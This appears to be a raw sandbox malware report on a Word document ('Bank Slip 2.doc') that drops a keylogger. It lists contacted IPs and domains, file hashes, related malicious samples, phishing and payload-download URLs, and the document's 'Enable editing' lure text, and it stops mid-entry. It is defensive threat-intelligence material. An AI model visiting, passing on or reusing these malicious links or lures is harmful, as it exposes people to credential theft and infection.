https://reallyfreegeoip.org/xml/ | obie8920193.exe, 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obie8920193.exe, 00000007.00000002.864677424.00000000022D4000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
193.122.6.168 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
104.21.53.203 | ampol.top | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1465556
Start date and time: 2024-07-01 20:05:15 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Bank Slip 2.doc
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@9/14@25/5
                    EGA Information:
                    • Successful, ratio: 66.7%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 34
                    • Number of non-executed functions: 10
                    Cookbook Comments:
                    • Found application associated with file extension: .doc
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Override analysis time to 75628.2303992625 for current running targets taking high CPU consumption
                    • Override analysis time to 151256.460798525 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 1804 because there are no executed functions
• Not all processes were analyzed; report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtCreateFile calls found.
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtEnumerateValueKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: Bank Slip 2.doc
Time | Type | Description
14:06:04 | API Interceptor | 275x Sleep call for process: EQNEDT32.EXE modified
14:06:08 | API Interceptor | 8653002x Sleep call for process: obie8920193.exe modified
14:06:12 | API Interceptor | 13x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
193.122.6.168
  JgRVqrgNs4.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  H3fwQALXDX.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  MT Marine Tiger.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  vsl particulars packing list.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  new order.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  z1MB267382625AE.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  Prouduct list Specifictions.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  LAQ-PO088PDF.exe | malicious | Snake Keylogger | checkip.dyndns.org/
  IMG_0071191023.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
  new purchase order.exe | malicious | Snake Keylogger | checkip.dyndns.org/
188.114.96.3
  QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/mHgyHEv5/download
  file.exe | malicious | FormBook | www.cavetta.org.mt/yhnb/
  http://johnlewisfr.com | malicious | Unknown | johnlewisfr.com/
  cL7A9wGE3w.exe | malicious | DCRat, PureLog Stealer, zgRAT | 445798cm.nyashka.top/ProviderEternalLinephpRequestSecurePacketprocessauthwordpress.php
  http://www.youkonew.anakembok.de/ | malicious | HTMLPhisher | www.youkonew.anakembok.de/cdn-cgi/challenge-platform/h/g/jsd/r/89b98144d9c843b7
  hnCn8gE6NH.exe | malicious | DCRat, PureLog Stealer, zgRAT | yenot.top/providerlowAuthApibigloadprotectflower.php
  288292021 ABB.exe | malicious | FormBook | www.oc7o0.top/2zff/?Hp=4L8xoD0W4Zo4sy87CvwWXXlmZfhaBYNiZZOBxyE5jHDJEgkxN8cq+PG6NIXzy1XRCqQIvL5VyJCknvUNNLKk6zzmBcbZOQR3Nr9VCMayuUBptQdoGcq8y485hKv0f5POEUdLprTAYpXY&5H=CtUlKhgP42a
  eiqj38BeRo.rtf | malicious | FormBook | www.liposuctionclinics2.today/btrd/?OR-TJfQ=g2Awi9g0RhXmDXdNu5BlCrpPGRTrEfCXfESYZTVa1wMirmNXITW5szlP5E4EhRYb22U+Mw==&2dc=kvXd-rKHCF
  Purchase Order -JJ023639-PDF.scr.exe | malicious | AgentTesla, PureLog Stealer | filetransfer.io/data-package/9a4iHwft/download
  Techno_PO LV12406-00311.xla.xlsx | malicious | Unknown | qr-in.com/cpGHnqq
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org | MT_80362_72605XLS.exe | malicious | PureLog Stealer, Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | JgRVqrgNs4.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | JgRVqrgNs4.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | H3fwQALXDX.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | oHchwlxMNG.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | zkB0qfWSJk.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | file.exe | malicious | Snake Keylogger | 188.114.96.3
reallyfreegeoip.org | scan copy.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exe | malicious | Snake Keylogger | 188.114.97.3
reallyfreegeoip.org | vsl particulars packing list.exe | malicious | Snake Keylogger | 188.114.96.3
checkip.dyndns.com | MT_80362_72605XLS.exe | malicious | PureLog Stealer, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | JgRVqrgNs4.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | JgRVqrgNs4.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | H3fwQALXDX.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | oHchwlxMNG.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | zkB0qfWSJk.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | file.exe | malicious | Snake Keylogger | 193.122.130.0
checkip.dyndns.com | scan copy.exe | malicious | Snake Keylogger | 132.226.8.169
checkip.dyndns.com | f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | vsl particulars packing list.exe | malicious | Snake Keylogger | 132.226.247.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ORACLE-BMC-31898US | MT_80362_72605XLS.exe | malicious | PureLog Stealer, Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | JgRVqrgNs4.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | JgRVqrgNs4.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | H3fwQALXDX.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | zkB0qfWSJk.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | file.exe | malicious | Snake Keylogger | 193.122.130.0
ORACLE-BMC-31898US | f3c462280fd1964d68c76ff6889bd3c766fa7140c07962dda32c0cb488188695_payload.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | MT Marine Tiger.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | new order.exe | malicious | Snake Keylogger | 158.101.44.242
ORACLE-BMC-31898US | MT Marine Tiger.exe | malicious | Snake Keylogger | 158.101.44.242
CLOUDFLARENETUS | https://click.pstmrk.it/3s/marryatbali.com%2Fdev%2F/EUHQ/Il62AQ/AQ/b5b2a7e4-6441-4a86-be73-2bf498fd1e9a/1/MLzcqAxPmj | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDd8ji5dO-2BtGjFwdkKxtwV-2BT-2FIDZLBFuspWHIOxNeRRYzjnPYwPcANsM7g6bBF5Eb-2FtBeYO84se-2BxM2-2FftOX61g3tKjw4-2BmFTEe65zPmmIV01t1qMegNLN27WQA4-2BWSzp8Exonts6yxo7jLDqmXJMwdw-3DSDkl_fylF09WDx4VRLHs1TE6by-2Fm24mY0V6PaWh-2BQeqn0Ay-2FMm-2FGvFUfwxkNWNqnFtCc1bg3RDtukBd6YTikFNr9njJPj8fPjtMTy7wESEphTN1Xt33p1RcATr-2Faa6esQ5neBHfE9PchIfWN2pGu-2FDyTo9jBl7IxKpEon9SyD5nvMkxE22jB5lqUsSt3NSAbiAi6xLdjPQNgUE2zZRGhN5aAjyw-3D-3D | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | https://endress-dot-polynomial-net-415922.uk.r.appspot.com/ | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDZIRt5HYOjqWnCYPyN2LzfWA5WJpqP15j9jckbuN-2BOb3WHvq-2F0cJQJdn87kO0MSPy0cFUfIeq9yRYQqhn4htwvkWsNx-2FFam80MMPtdHc4W-2BjtofBO6rARCMSHyY6bevTzA-3D-3Dl5B0_ZmIHaGi20aqBKA3sG1JfXxzr0sPFOA2uIfsKnhz-2FHsHlNN56Un7vVp-2FHLlgOEVpr0kMJXFtRNAtOmyfAL3Lkes92MiYR3EbwQLlO4as4ETAbkJiOU1P-2F6SWFB0T3LaiXQjVG47m8S-2B1KmL8spseUk6IF4zRohQ-2B-2FFQktOHSnuyuc8HWSvn8BvqxHU3iGIxrIS-2FUCmGYTBpWBLsLVoZYmGg-3D-3D | malicious | HTMLPhisher | 104.17.2.184
CLOUDFLARENETUS | 8hd98EhtIFcYkb8.exe | malicious | FormBook | 172.67.194.145
CLOUDFLARENETUS | SecuriteInfo.com.Win32.BootkitX-gen.7605.8583.exe | malicious | Babuk, Clipboard Hijacker, Djvu | 188.114.97.3
CLOUDFLARENETUS | PO 4500005168 NIKOLA.exe | malicious | AgentTesla | 104.26.13.205
CLOUDFLARENETUS | http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDefjjvAc1VCRhzhBKQTVpjzhejQ8Rhu1zO1vWGAUfUeULJrKwFSbIOyWIUfIv-2Flo3yTYESP-2B78w2V31KWz3gTVG4x9fJGaMxyv5FQX0-2FC02SNh0q62WGV8moxgoMPN13ug-3D-3D0M2T_RK3E7lcHJh6RzNRog0V2Ww4F1i1LQS7pYYmvozE9BtFWFH8CBc2C7lCJRjsdH3VwNbJDjo91Q5gKMT9cCcdXw8AkweIV-2FNLnytbk6yO5x98zOjWQvldOWLzS2kOJk-2Bc9a9xwBmgqVDiuxw1Lx4HAzZ-2Bjhc2IjRsVwgsa2WyKs6mVKScqAKEYCpz9uhwD3RMPm3P4ijESTEtLH2hoAVbwO9XnUT-2BT6XJFuujR9hf41ZQ-3D | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | BIE (1).eml | malicious | Phisher | 104.17.25.14
CLOUDFLARENETUS | EFT 06282024, 013441 PM.html | malicious | Unknown | 104.17.24.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
05af1f5ca1b87cc9cc9b25185115607d | Scan_Hsbc_Payment_advice.xls | malicious | Lokibot | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | 20240506_12082.xls | malicious | Unknown | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | zahtjev za ponudu.xls | malicious | Unknown | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | INQUIRY#809676-JULY1.xla.xlsx | malicious | Unknown | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.ShellCode.69.26008.28945.rtf | malicious | Remcos | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | Plata.docx.doc | malicious | Unknown | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | SecuriteInfo.com.Exploit.ShellCode.69.25469.24539.rtf | malicious | Unknown | 188.114.96.3
05af1f5ca1b87cc9cc9b25185115607d | gFTk7fAh55.rtf | malicious | Unknown | 188.114.96.3
7dcce5b76c8b17472d024758970a406b | Scan_Hsbc_Payment_advice.xls | malicious | Lokibot | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | RFQ_4155965-EU2406.xlsx | malicious | AgentTesla, PureLog Stealer | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | 20240506_12082.xls | malicious | Unknown | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | INQUIRY#809676-JULY1.xla.xlsx | malicious | Remcos | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | zahtjev za ponudu.xls | malicious | Unknown | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | Renameme@1.xls | malicious | Unknown | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | Quotation.xls | malicious | Remcos | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | Renameme@1.xls | malicious | Unknown | 104.21.53.203
7dcce5b76c8b17472d024758970a406b | INQUIRY#809676-JULY1.xla.xlsx | malicious | Unknown | 104.21.53.203
                    No context
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):64
                    Entropy (8bit):0.34726597513537405
                    Encrypted:false
                    SSDEEP:3:Nlll:Nll
                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:@...e...........................................................
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):554504
                    Entropy (8bit):7.930758266319395
                    Encrypted:false
                    SSDEEP:12288:+RfMJlRPMhU1n75ZyoFXm5PpVHSyE7ZhvCgC3UGGqRyUs3PKspeuD3kR:pbRj5ZrXm57ktqRyp3PKSM
                    MD5:DBDACF479A9DD40133701E06E6DC401C
                    SHA1:5E78767CF2498D34FC27674FF326F2A7CE5AB2A3
                    SHA-256:A597F53ED7D5E4CC1AF67800969953F431C7C99467D75A42E3DB360D7302283C
                    SHA-512:F46D0FCE9AD0E9C4A9142E53D02AA903DC082872068DEA6597C8D22E6154F25976A309815A8EFD721B5451CEB3646976D69E664DB261BECD18F250B8FDAA89A6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0...... .......4... ...@....@.. ....................................@..................................4..O....@...............@...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):16384
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:CE338FE6899778AACFC28414F2D9498B
                    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):200192
                    Entropy (8bit):3.4930021702808727
                    Encrypted:false
                    SSDEEP:6144:LyemryemryemryemryemryemryemryemryemryemryemVKK:K
                    MD5:579E4057D3780D9D70F542FA611E7DC6
                    SHA1:8BF86DD3DB525335BBD308999427520ACC530552
                    SHA-256:4EE9F7F074D9276AB50B886AC35B39F58A8AEA03486CA5C2F5D5CB9909FCC654
                    SHA-512:C419FF0DD5454D934F331FB5799B66DE1923093F25F6D8FB2223FD306012C8FBAB2298167100A96F1688593CD495303B24B49EDBCE420E95F21F6C4F39327A9D
                    Malicious:false
                    Reputation:low
                    Preview:3.5.0.0.1.1.1.8.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1536
                    Entropy (8bit):1.3568273340340578
                    Encrypted:false
                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbp:IiiiiiiiiifdLloZQc8++lsJe1Mze
                    MD5:FA901E7FCD2D72CCAD762E6F4E67345A
                    SHA1:87DA4FC64F137B5C84C440C3EA31D52646BFA830
                    SHA-256:26CDB44AD37C36DFA9F40D19FFE63F8D0034E0887481DECCD09449AC5CDFB1F5
                    SHA-512:0BE49987BF98770B3E98A297C20557B3F1D5CF0C618BB37A8070E79085884A2E9B48C3D99323509FB259989238C938BCE6B1591A8ACE068007DE25031B137313
                    Malicious:false
                    Reputation:low
                    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Mon Jul 1 17:06:03 2024, length=424988, window=hide
                    Category:dropped
                    Size (bytes):1019
                    Entropy (8bit):4.557659213137868
                    Encrypted:false
                    SSDEEP:12:8NBnC80gXg/XAlCPCHaXQ5B5B/BGFX+WIoNFjuicvbIuiarDtZ3YilMMEpxRljKc:8NBnvk/XTg5LbkeyNeEuiWDv3qOk7N
                    MD5:B835129373E7F5EED717412B30BB172E
                    SHA1:25DBF2E5E4DF7AC2E31F87FF9AC41ED7776378E5
                    SHA-256:D8CBEF2A456739AC1E0FB2DD3441023F0049EF92AD8FEE861ACC623AF51F465B
                    SHA-512:E58614E701B01800CF32C8EB085DFCD66B630E511291F868D571C3B8ACABD366F7A08541BFAAFC85A2DA8270DA58734691B19AA5987A98063D20485EB0A1DB07
                    Malicious:false
                    Preview:L..................F.... .....d.r.....d.r...D..U.....|...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X....user.8......QK.X.X..*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..|...X. .BANKSL~1.DOC..L.......WD..WD.*.........................B.a.n.k. .S.l.i.p. .2...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\413794\Users.user\Desktop\Bank Slip 2.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.a.n.k. .S.l.i.p. .2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......413794..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Generic INItialization configuration [folders]
                    Category:dropped
                    Size (bytes):56
                    Entropy (8bit):4.651017645233257
                    Encrypted:false
                    SSDEEP:3:M1tFucXLUYCm4VFucXLUYCv:MwZ0Z1
                    MD5:5CCBE259BC7302620DEE438CE2CDE35B
                    SHA1:158323D4D5E544D1A4D755855E4278978FEF345F
                    SHA-256:0EA5DFD0DC5E9DA1F2139AD6B340C6703E0B02282617453CEC09A683F41CB05C
                    SHA-512:6F9FEBB5583CEA52833B8902884E33252093952044981D33C468D8FD201F21A4B82B9B66264A4C46D02995FE7F077D3CA8AC4E38CD9A4C06B378D5F014C0BFB3
                    Malicious:false
                    Preview:[doc]..Bank Slip 2.LNK=0..[folders]..Bank Slip 2.LNK=0..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                    Category:dropped
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):554504
                    Entropy (8bit):7.930758266319395
                    Encrypted:false
